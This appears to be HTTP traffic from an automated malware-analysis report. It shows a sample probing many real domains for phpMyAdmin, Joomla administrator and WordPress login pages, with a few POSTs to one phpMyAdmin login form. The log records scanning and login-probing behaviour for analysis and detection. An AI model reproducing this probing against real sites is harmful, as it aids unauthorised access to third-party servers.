Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: gmcocorp.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: joaz.deAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: collevilca.itAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: art-paix-di.orgAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: hotmail.fr.auAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: creativ-moebelwerkstaetten.deAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: att.com.phAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: popular.deAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: voltage-distribution.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: strategicimpact.com.auAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: waukesha-water.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: sportclinic.co.ilAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: att.com.phAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: touktoukcie.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: att.com.auAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: acidvision.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: att.com.sgAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: breecetechnology.co.zaAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: fortressrealcapital.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: hotmail.fr.auAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: markoren.noAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: eyegage.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: montessorihawaii.orgAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: wilsonfamilyinsurance.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: braekling.deAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: eskimo.chAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: m-viper.deAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: cfca.euAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: wefttechnologies.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: cpsgroupe.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /administrator/ HTTP/1.1Host: att.com.auAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: ksv-schwimmen.deAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: mlbx.matrix.jpAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: shinko-kensetsu.co.jpAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: houseguru.com.auAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: iisalessandrini.itAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: att.com.hkAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: att.com.auAccept: /Accept-Encoding: deflate, gzipCookie: expiry_partner=; lander_type=parking; caf_ipaddr=191.96.227.222; _policy={"restricted_market":false,"tracking_market":"none"}; country=US; city="Phoenix"User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: https://att.com.au/administrator/
Source: global traffic	HTTP traffic detected: POST /phpmyadmin/index.php?route=/ HTTP/1.1Host: fortressrealcapital.comAccept: /Accept-Encoding: deflate, gzipCookie: phpMyAdmin_https=thvdkd6ka048si3epmtvilp7ef; pma_lang_https=enUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: https://fortressrealcapital.com/phpmyadmin/Content-Length: 174Content-Type: application/x-www-form-urlencoded
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: www.glazing-bt.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: www.stylesense.co.ukAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: www.markoren.noAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /administrator/ HTTP/1.1Host: fortressrealcapital.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /administrator/ HTTP/1.1Host: att.com.auAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /administrator/ HTTP/1.1Host: acidvision.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: www.stylesense.co.ukAccept: /Accept-Encoding: deflate, gzipCookie: PHPSESSID=1k9i469srqfgmr47e40c9d4e5jUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: att.com.auAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: ksv-schwimmen.deAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: popular.deAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: fortressrealcapital.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: amsantechnology.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: strategicimpact.com.auAccept: /Accept-Encoding: deflate, gzipCookie: dps_site_id=us-east-1User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: att.com.auAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: norwegischlernen.infoAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: cfgteam.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: popular.deAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: cfca.euAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: waukesha-water.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: blauthlaw.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: iisalessandrini.edu.itAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: voltage-distribution.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: att.com.auAccept: /Accept-Encoding: deflate, gzipCookie: expiry_partner=; lander_type=parking; caf_ipaddr=191.96.227.222; _policy={"restricted_market":false,"tracking_market":"none"}; country=US; city="Phoenix"User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: https://att.com.au/administrator/
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: amsantechnology.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: acidvision.comAccept: /Accept-Encoding: deflate, gzipCookie: expiry_partner=; lander_type=forwarder; caf_ipaddr=191.96.227.222; _policy={"restricted_market":false,"tracking_market":"none"}; country=US; city="Phoenix"User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: https://acidvision.com/administrator/
Source: global traffic	HTTP traffic detected: GET /administrator HTTP/1.1Host: eyegage.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: acidvision.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /administrator/ HTTP/1.1Host: norwegischlernen.infoAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /administrator/ HTTP/1.1Host: cabinet-orsika.frAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /administrator/ HTTP/1.1Host: m-viper.deAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /administrator/ HTTP/1.1Host: eskimo.chAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /administrator/ HTTP/1.1Host: stylesense.co.ukAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: www.cabinet-orsika.frAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /administrator/ HTTP/1.1Host: blauthlaw.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /administrator/ HTTP/1.1Host: strategicimpact.com.auAccept: /Accept-Encoding: deflate, gzipCookie: dps_site_id=us-east-1User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: fortressrealcapital.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: https://fortressrealcapital.com/administrator/
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: m-viper.deAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: braekling.deAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: eskimo.chAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /administrator/ HTTP/1.1Host: cfgteam.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin HTTP/1.1Host: iisalessandrini.edu.itAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: POST /phpmyadmin/index.php?route=/ HTTP/1.1Host: fortressrealcapital.comAccept: /Accept-Encoding: deflate, gzipCookie: phpMyAdmin_https=lv324hi5uec14end8mi8sc3po8; pma_lang_https=enUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: https://fortressrealcapital.com/phpmyadmin/Content-Length: 147Content-Type: application/x-www-form-urlencoded
Source: global traffic	HTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: blauthlaw.comAccept: /Accept-Encoding: deflate, gzipCookie: traffic_target=gd; lander_type=parkweb; caf_ipaddr=191.96.227.222; _policy={"restricted_market":false,"tracking_market":"none"}; country=US; city="Phoenix"User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: https://blauthlaw.com/administrator/
Source: global traffic	HTTP traffic detected: GET /administrator/ HTTP/1.1Host: amsantechnology.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /administrator/ HTTP/1.1Host: fortressrealcapital.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: https://fortressrealcapital.com/administrator/
Source: global traffic	HTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: strategicimpact.com.auAccept: /Accept-Encoding: deflate, gzipCookie: dps_site_id=us-east-1User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: https://strategicimpact.com.au/administrator/
Source: global traffic	HTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: m-viper.deAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: https://m-viper.de/administrator/
Source: global traffic	HTTP traffic detected: GET /phpMyAdmin/ HTTP/1.1Host: att.com.auAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /administrator/ HTTP/1.1Host: ksv-schwimmen.deAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin HTTP/1.1Host: eyegage.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: cfgteam.comAccept: /Accept-Encoding: deflate, gzipCookie: traffic_target=gd; lander_type=parkweb; caf_ipaddr=191.96.227.222; _policy={"restricted_market":false,"tracking_market":"none"}; country=US; city="Phoenix"User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: https://cfgteam.com/administrator/
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: markoren.noAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpMyAdmin/ HTTP/1.1Host: cfgteam.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: norwegischlernen.infoAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: https://norwegischlernen.info/administrator/
Source: global traffic	HTTP traffic detected: GET /phpMyAdmin/ HTTP/1.1Host: att.com.auAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /administrator/ HTTP/1.1Host: www.stylesense.co.ukAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: fortressrealcapital.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpMyAdmin/ HTTP/1.1Host: strategicimpact.com.auAccept: /Accept-Encoding: deflate, gzipCookie: dps_site_id=us-east-1User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpMyAdmin/ HTTP/1.1Host: acidvision.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: eyegage.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: https://www.eyegage.com/administrator
Source: global traffic	HTTP traffic detected: GET /phpMyAdmin/ HTTP/1.1Host: voltage-distribution.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /wp-login.php HTTP/1.1Host: acidvision.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpMyAdmin/ HTTP/1.1Host: blauthlaw.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpMyAdmin/ HTTP/1.1Host: popular.deAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpMyAdmin/ HTTP/1.1Host: waukesha-water.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /wp-login.php HTTP/1.1Host: popular.deAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /administrator/ HTTP/1.1Host: norwegischlernen.infoAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: https://norwegischlernen.info/administrator/
Source: global traffic	HTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: eskimo.chAccept: /Accept-Encoding: deflate, gzipCookie: PHPSESSID=i3lvqgq0ufurmkbj7l8g7oodcfvqs85sUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: https://eskimo.ch/administrator/
Source: global traffic	HTTP traffic detected: GET /wp-login.php HTTP/1.1Host: blauthlaw.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: glazing-bt.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpMyAdmin/ HTTP/1.1Host: norwegischlernen.infoAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /wp-login.php HTTP/1.1Host: att.com.auAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: www.markoren.noAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: cabinet-orsika.frAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: ksv-schwimmen.deAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpMyAdmin/ HTTP/1.1Host: cfca.euAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
